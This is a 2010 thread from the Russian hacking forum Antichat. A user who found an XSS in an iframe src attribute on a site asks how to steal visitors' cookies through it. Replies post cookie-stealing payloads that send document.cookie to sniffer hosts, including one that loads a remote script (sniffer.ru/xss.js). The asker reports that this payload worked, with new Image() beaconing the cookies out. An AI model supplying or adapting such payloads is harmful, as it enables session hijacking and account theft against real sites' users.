Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   XSS в IFRAME SRC. Как взять куки? (https://forum.antichat.xyz/showthread.php?t=204938)

TomskDiver 18.05.2010 17:31

XSS в IFRAME SRC. Как взять куки?
 
Нашел сайт с xss в теге iframe в параметре src. Т.е. работает <iframe src="javascript:alert('XSS')" style="display:none;"></iframe>. Но вот никак не получается сливать куки. Что только не пробовал, что только не читал:( Можно ли как-то красть куки через данную уязвимость?

Redwood 18.05.2010 18:27

Цитата:

Сообщение от TomskDiver
Нашел сайт с xss в теге iframe в параметре src. Т.е. работает <iframe src="javascript:alert('XSS')" style="display:none;"></iframe>. Но вот никак не получается сливать куки. Что только не пробовал, что только не читал:( Можно ли как-то красть куки через данную уязвимость?

<iframe src="http://site.ru/sniffer.php?с='+document.cookie+'" style="display:none;"></iframe>

TomskDiver 18.05.2010 18:35

Цитата:

Сообщение от Redwood
<iframe src="http://site.ru/sniffer.php='+document.cookie+'" style="display:none;"></iframe>

Как мне кажется у вас ошибка.
если после php оставить = то ничего не выводится.
если после php поставить например ?c= то выводится: c='+document.cookie+'

В src разве сработает document.cookie? Ведь надо писать что-то типа src="Javascript:blablabla document.cookie "

IndigoMan 18.05.2010 18:38

scr параметр зависим от твоих входных данных? если нет, то ты просто модифицировал код html и все...это даже не уязвимость получается.

Redwood 18.05.2010 18:49

Цитата:

Сообщение от TomskDiver
В src разве сработает document.cookie? Ведь надо писать что-то типа src="javascript:blablabla document.cookie "

Сработает

satana-fu 18.05.2010 18:55

Цитата:

<iframe src="javascript:x=document.createElement('script') ;x.src='http://sniffer.ru/xss.js';document.body.appendChild(x);" style="display:none;"></iframe>
попробуй так

IndigoMan 18.05.2010 19:10

и так работает
<iframe src="http://www.evilsite.com/?cookie=" + document. cookie style="display:none;"></iframe>

TomskDiver 19.05.2010 07:27

Redwood, IndigoMan - то как вы предложили не работает. Снифер будет выводить слова document. cookie, а не сами куки.
satana-fu - РЕСПЕКТ! Получилось. В дополнительном js файле делаю new Image() c src на снифер и всё работает.


Время: 20:41